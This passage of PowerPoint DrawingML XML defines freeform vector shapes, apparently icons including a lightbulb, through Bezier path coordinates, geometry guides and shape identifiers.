                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270"/>
                    <a:pt x="5" y="270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5" y="270"/>
                    <a:pt x="6" y="269"/>
                    <a:pt x="6" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="269"/>
                    <a:pt x="6" y="269"/>
                    <a:pt x="6" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="267"/>
                    <a:pt x="7" y="267"/>
                    <a:pt x="7" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="274"/>
                    <a:pt x="8" y="274"/>
                    <a:pt x="9" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="275"/>
                    <a:pt x="11" y="275"/>
                    <a:pt x="12" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="277"/>
                    <a:pt x="13" y="278"/>
                    <a:pt x="13" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="295"/>
                    <a:pt x="24" y="307"/>
                    <a:pt x="29" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="322"/>
                    <a:pt x="30" y="322"/>
                    <a:pt x="30" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="354"/>
                    <a:pt x="44" y="354"/>
                    <a:pt x="55" y="365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="367"/>
                    <a:pt x="58" y="369"/>
                    <a:pt x="60" y="371"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="379"/>
                    <a:pt x="80" y="391"/>
                    <a:pt x="80" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="392"/>
                    <a:pt x="81" y="392"/>
                    <a:pt x="81" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="393"/>
                    <a:pt x="82" y="393"/>
                    <a:pt x="83" y="394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="394"/>
                    <a:pt x="84" y="394"/>
                    <a:pt x="84" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="396"/>
                    <a:pt x="86" y="396"/>
                    <a:pt x="88" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="398"/>
                    <a:pt x="89" y="398"/>
                    <a:pt x="90" y="397"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="397"/>
                    <a:pt x="92" y="397"/>
                    <a:pt x="93" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="396"/>
                    <a:pt x="93" y="395"/>
                    <a:pt x="93" y="394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="375"/>
                    <a:pt x="83" y="375"/>
                    <a:pt x="83" y="375"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="375"/>
                    <a:pt x="84" y="375"/>
                    <a:pt x="85" y="375"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="371"/>
                    <a:pt x="85" y="371"/>
                    <a:pt x="85" y="371"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="359"/>
                    <a:pt x="78" y="359"/>
                    <a:pt x="77" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="351"/>
                    <a:pt x="79" y="351"/>
                    <a:pt x="79" y="351"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="348"/>
                    <a:pt x="81" y="348"/>
                    <a:pt x="79" y="342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="342"/>
                    <a:pt x="79" y="341"/>
                    <a:pt x="78" y="340"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="339"/>
                    <a:pt x="77" y="338"/>
                    <a:pt x="77" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="335"/>
                    <a:pt x="75" y="332"/>
                    <a:pt x="73" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="325"/>
                    <a:pt x="69" y="320"/>
                    <a:pt x="67" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="316"/>
                    <a:pt x="67" y="316"/>
                    <a:pt x="66" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="314"/>
                    <a:pt x="66" y="313"/>
                    <a:pt x="66" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="286"/>
                    <a:pt x="77" y="286"/>
                    <a:pt x="77" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="283"/>
                    <a:pt x="87" y="268"/>
                    <a:pt x="87" y="260"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="210" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="0"/>
                    <a:pt x="210" y="0"/>
                    <a:pt x="210" y="0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0" y="0"/>
                    <a:pt x="210" y="0"/>
                    <a:pt x="210" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="198" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="2"/>
                    <a:pt x="196" y="2"/>
                    <a:pt x="195" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="2"/>
                    <a:pt x="195" y="2"/>
                    <a:pt x="195" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="2"/>
                    <a:pt x="193" y="2"/>
                    <a:pt x="191" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="2"/>
                    <a:pt x="191" y="2"/>
                    <a:pt x="191" y="2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191" y="3"/>
                    <a:pt x="191" y="3"/>
                    <a:pt x="190" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="3"/>
                    <a:pt x="190" y="3"/>
                    <a:pt x="190" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="3"/>
                    <a:pt x="189" y="3"/>
                    <a:pt x="189" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="4"/>
                    <a:pt x="183" y="4"/>
                    <a:pt x="180" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="5"/>
                    <a:pt x="180" y="5"/>
                    <a:pt x="180" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="5"/>
                    <a:pt x="178" y="5"/>
                    <a:pt x="177" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="5"/>
                    <a:pt x="177" y="5"/>
                    <a:pt x="177" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="6"/>
                    <a:pt x="173" y="6"/>
                    <a:pt x="172" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="7"/>
                    <a:pt x="170" y="7"/>
                    <a:pt x="169" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="7"/>
                    <a:pt x="170" y="7"/>
                    <a:pt x="171" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="7"/>
                    <a:pt x="168" y="8"/>
                    <a:pt x="168" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="8"/>
                    <a:pt x="167" y="8"/>
                    <a:pt x="167" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="8"/>
                    <a:pt x="168" y="8"/>
                    <a:pt x="168" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="8"/>
                    <a:pt x="166" y="8"/>
                    <a:pt x="166" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="8"/>
                    <a:pt x="165" y="8"/>
                    <a:pt x="165" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="8"/>
                    <a:pt x="166" y="8"/>
                    <a:pt x="166" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="8"/>
                    <a:pt x="165" y="8"/>
                    <a:pt x="164" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="9"/>
                    <a:pt x="164" y="9"/>
                    <a:pt x="163" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="9"/>
                    <a:pt x="163" y="9"/>
                    <a:pt x="162" y="9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2" y="9"/>
                    <a:pt x="162" y="9"/>
                    <a:pt x="162" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="9"/>
                    <a:pt x="162" y="9"/>
                    <a:pt x="162" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="6"/>
                    <a:pt x="184" y="3"/>
                    <a:pt x="205" y="1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11" y="0"/>
                    <a:pt x="212" y="0"/>
                    <a:pt x="213" y="0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14" y="0"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="0"/>
                    <a:pt x="215" y="0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16" y="0"/>
                    <a:pt x="215" y="0"/>
                    <a:pt x="214" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="214" y="0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15" y="0"/>
                    <a:pt x="216" y="0"/>
                    <a:pt x="217" y="0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217" y="0"/>
                    <a:pt x="218" y="0"/>
                    <a:pt x="218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16" y="0"/>
                    <a:pt x="215" y="0"/>
                    <a:pt x="214" y="0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214" y="0"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="213" y="0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211" y="0"/>
                    <a:pt x="210" y="0"/>
                    <a:pt x="209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208" y="0"/>
                    <a:pt x="207" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="0"/>
                    <a:pt x="206" y="1"/>
                    <a:pt x="205" y="1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5" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="202" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="199" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1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201" y="1"/>
                    <a:pt x="202" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                    <a:pt x="203" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="199" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="1"/>
                    <a:pt x="198" y="1"/>
                    <a:pt x="197" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="2"/>
                    <a:pt x="194" y="2"/>
                    <a:pt x="192" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="2"/>
                    <a:pt x="194" y="2"/>
                    <a:pt x="196" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="2"/>
                    <a:pt x="196" y="2"/>
                    <a:pt x="196" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="2"/>
                    <a:pt x="196" y="2"/>
                    <a:pt x="196" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="2"/>
                    <a:pt x="196" y="2"/>
                    <a:pt x="196" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="2"/>
                    <a:pt x="198" y="2"/>
                    <a:pt x="198" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="2"/>
                    <a:pt x="198" y="2"/>
                    <a:pt x="197" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="2"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                    <a:pt x="201" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                    <a:pt x="200" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="199" y="1"/>
                    <a:pt x="198" y="2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44" name="Freeform 1556">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D703204-9CE7-43BB-A02B-9C6D4FACD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237" y="2339975"/>
              <a:ext cx="285750" cy="376237"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 111765 w 285750"/>
                <a:gd name="connsiteY0" fmla="*/ 344487 h 376237"/>
                <a:gd name="connsiteX1" fmla="*/ 175571 w 285750"/>
                <a:gd name="connsiteY1" fmla="*/ 344487 h 376237"/>
                <a:gd name="connsiteX2" fmla="*/ 187324 w 285750"/>
                <a:gd name="connsiteY2" fmla="*/ 353146 h 376237"/>
                <a:gd name="connsiteX3" fmla="*/ 175571 w 285750"/>
                <a:gd name="connsiteY3" fmla="*/ 363537 h 376237"/>
                <a:gd name="connsiteX4" fmla="*/ 161595 w 285750"/>
                <a:gd name="connsiteY4" fmla="*/ 363537 h 376237"/>
                <a:gd name="connsiteX5" fmla="*/ 157568 w 285750"/>
                <a:gd name="connsiteY5" fmla="*/ 372665 h 376237"/>
                <a:gd name="connsiteX6" fmla="*/ 146987 w 285750"/>
                <a:gd name="connsiteY6" fmla="*/ 376237 h 376237"/>
                <a:gd name="connsiteX7" fmla="*/ 140349 w 285750"/>
                <a:gd name="connsiteY7" fmla="*/ 376237 h 376237"/>
                <a:gd name="connsiteX8" fmla="*/ 129769 w 285750"/>
                <a:gd name="connsiteY8" fmla="*/ 372665 h 376237"/>
                <a:gd name="connsiteX9" fmla="*/ 125742 w 285750"/>
                <a:gd name="connsiteY9" fmla="*/ 363537 h 376237"/>
                <a:gd name="connsiteX10" fmla="*/ 119741 w 285750"/>
                <a:gd name="connsiteY10" fmla="*/ 363537 h 376237"/>
                <a:gd name="connsiteX11" fmla="*/ 111765 w 285750"/>
                <a:gd name="connsiteY11" fmla="*/ 363537 h 376237"/>
                <a:gd name="connsiteX12" fmla="*/ 100012 w 285750"/>
                <a:gd name="connsiteY12" fmla="*/ 353146 h 376237"/>
                <a:gd name="connsiteX13" fmla="*/ 111765 w 285750"/>
                <a:gd name="connsiteY13" fmla="*/ 344487 h 376237"/>
                <a:gd name="connsiteX14" fmla="*/ 142875 w 285750"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 376237"/>
                <a:gd name="connsiteX15" fmla="*/ 285750 w 285750"/>
                <a:gd name="connsiteY15" fmla="*/ 142875 h 376237"/>
                <a:gd name="connsiteX16" fmla="*/ 233757 w 285750"/>
                <a:gd name="connsiteY16" fmla="*/ 253124 h 376237"/>
                <a:gd name="connsiteX17" fmla="*/ 223735 w 285750"/>
                <a:gd name="connsiteY17" fmla="*/ 259205 h 376237"/>
                <a:gd name="connsiteX18" fmla="*/ 217958 w 285750"/>
                <a:gd name="connsiteY18" fmla="*/ 266379 h 376237"/>
                <a:gd name="connsiteX19" fmla="*/ 202368 w 285750"/>
                <a:gd name="connsiteY19" fmla="*/ 291540 h 376237"/>
                <a:gd name="connsiteX20" fmla="*/ 177061 w 285750"/>
                <a:gd name="connsiteY20" fmla="*/ 315912 h 376237"/>
                <a:gd name="connsiteX21" fmla="*/ 177635 w 285750"/>
                <a:gd name="connsiteY21" fmla="*/ 315912 h 376237"/>
                <a:gd name="connsiteX22" fmla="*/ 178730 w 285750"/>
                <a:gd name="connsiteY22" fmla="*/ 315912 h 376237"/>
                <a:gd name="connsiteX23" fmla="*/ 192087 w 285750"/>
                <a:gd name="connsiteY23" fmla="*/ 329459 h 376237"/>
                <a:gd name="connsiteX24" fmla="*/ 178730 w 285750"/>
                <a:gd name="connsiteY24" fmla="*/ 341312 h 376237"/>
                <a:gd name="connsiteX25" fmla="*/ 108607 w 285750"/>
                <a:gd name="connsiteY25" fmla="*/ 341312 h 376237"/>
                <a:gd name="connsiteX26" fmla="*/ 95250 w 285750"/>
                <a:gd name="connsiteY26" fmla="*/ 329459 h 376237"/>
                <a:gd name="connsiteX27" fmla="*/ 108607 w 285750"/>
                <a:gd name="connsiteY27" fmla="*/ 315912 h 376237"/>
                <a:gd name="connsiteX28" fmla="*/ 109294 w 285750"/>
                <a:gd name="connsiteY28" fmla="*/ 315912 h 376237"/>
                <a:gd name="connsiteX29" fmla="*/ 84364 w 285750"/>
                <a:gd name="connsiteY29" fmla="*/ 291540 h 376237"/>
                <a:gd name="connsiteX30" fmla="*/ 69007 w 285750"/>
                <a:gd name="connsiteY30" fmla="*/ 266379 h 376237"/>
                <a:gd name="connsiteX31" fmla="*/ 61907 w 285750"/>
                <a:gd name="connsiteY31" fmla="*/ 257428 h 376237"/>
                <a:gd name="connsiteX32" fmla="*/ 41847 w 285750"/>
                <a:gd name="connsiteY32" fmla="*/ 243903 h 376237"/>
                <a:gd name="connsiteX33" fmla="*/ 0 w 285750"/>
                <a:gd name="connsiteY33" fmla="*/ 142875 h 376237"/>
                <a:gd name="connsiteX34" fmla="*/ 142875 w 285750"/>
                <a:gd name="connsiteY34" fmla="*/ 0 h 3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85750" h="376237">
                  <a:moveTo>
                    <a:pt x="111765" y="344487"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="175571" y="344487"/>
                    <a:pt x="175571" y="344487"/>
                    <a:pt x="175571" y="344487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182287" y="344487"/>
                    <a:pt x="187324" y="347951"/>
                    <a:pt x="187324" y="353146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187324" y="358342"/>
                    <a:pt x="182287" y="363537"/>
                    <a:pt x="175571" y="363537"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="161595" y="363537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157568" y="372665"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154871" y="374976"/>
                    <a:pt x="151136" y="376237"/>
                    <a:pt x="146987" y="376237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140349" y="376237"/>
                    <a:pt x="140349" y="376237"/>
                    <a:pt x="140349" y="376237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136200" y="376237"/>
                    <a:pt x="132466" y="374976"/>
                    <a:pt x="129769" y="372665"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="125742" y="363537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119741" y="363537"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="111765" y="363537"/>
                    <a:pt x="111765" y="363537"/>
                    <a:pt x="111765" y="363537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105049" y="363537"/>
                    <a:pt x="100012" y="358342"/>
                    <a:pt x="100012" y="353146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100012" y="347951"/>
                    <a:pt x="105049" y="344487"/>
                    <a:pt x="111765" y="344487"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="142875" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="221783" y="0"/>
                    <a:pt x="285750" y="63967"/>
                    <a:pt x="285750" y="142875"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285750" y="187261"/>
                    <a:pt x="265511" y="226919"/>
                    <a:pt x="233757" y="253124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="223735" y="259205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217958" y="266379"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="213131" y="273155"/>
                    <a:pt x="207855" y="281454"/>
                    <a:pt x="202368" y="291540"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="177061" y="315912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177635" y="315912"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178730" y="315912"/>
                    <a:pt x="178730" y="315912"/>
                    <a:pt x="178730" y="315912"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187078" y="315912"/>
                    <a:pt x="192087" y="322685"/>
                    <a:pt x="192087" y="329459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192087" y="336232"/>
                    <a:pt x="187078" y="341312"/>
                    <a:pt x="178730" y="341312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108607" y="341312"/>
                    <a:pt x="108607" y="341312"/>
                    <a:pt x="108607" y="341312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101928" y="341312"/>
                    <a:pt x="95250" y="336232"/>
                    <a:pt x="95250" y="329459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95250" y="322685"/>
                    <a:pt x="101928" y="315912"/>
                    <a:pt x="108607" y="315912"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109294" y="315912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84364" y="291540"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="78959" y="281454"/>
                    <a:pt x="73762" y="273155"/>
                    <a:pt x="69007" y="266379"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61907" y="257428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41847" y="243903"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15992" y="218048"/>
                    <a:pt x="0" y="182329"/>
                    <a:pt x="0" y="142875"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="63967"/>
                    <a:pt x="63967" y="0"/>
                    <a:pt x="142875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706D74C5-F77A-421E-8F6C-28FEC46210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9562" y="3685748"/>
              <a:ext cx="74614" cy="392236"/>
              <a:chOff x="1543" y="2321"/>
              <a:chExt cx="47" cy="247"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr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EC981F0B-421C-429F-8458-B11E694F8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21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A4FE3F17-0A83-4528-B264-9013382B8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23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75D04ADB-E365-4C89-8493-D5ACDEFC7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24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9188CD47-0653-4280-B847-BA524A365A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27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67C0BB8F-9D54-43B3-B8A2-EF07C0342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29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EDC5580C-DE73-497C-8C16-12CA04D2B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30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26409FCB-9054-4269-A794-5550F5275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32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A4E794BB-9F1B-44A1-BE60-743B014DE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3" y="2333"/>
                <a:ext cx="1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701DB502-312A-4060-AA1D-EB0BDF87E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35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D8D1B1C7-E2C4-4B5D-9FD8-271BBD36D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36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50DFE0AC-F89B-4106-AF99-57902FDFD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38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1714AA9B-9450-4354-8553-1D521ED29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39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9E83A153-EB1A-4282-8D93-531C099B4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340"/>
                <a:ext cx="8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B50A23F4-7C64-4D36-BEB3-0079E196A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42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26924A43-171D-434C-949D-D76B3FB26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43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D37DCFF1-D65E-469D-944B-889B756D6A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44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80" name="Rectangle 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1060A37-D4C0-4412-B9A0-659E8F216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46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A04964E5-FA50-4EC8-9B9D-400389985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3" y="2348"/>
                <a:ext cx="1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16B7A40B-78CD-4273-8E25-FF3E7BB4E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50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6CBD3E4B-AEF2-4F5A-8EF8-AC2AFD2EC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51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D1CD8896-27E3-4A67-9D71-96F0CEAC3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52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0ACD5D0B-717C-4568-805D-C0A8317F3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54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71D8F9BC-BF9D-4884-9867-95D4DC5F2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355"/>
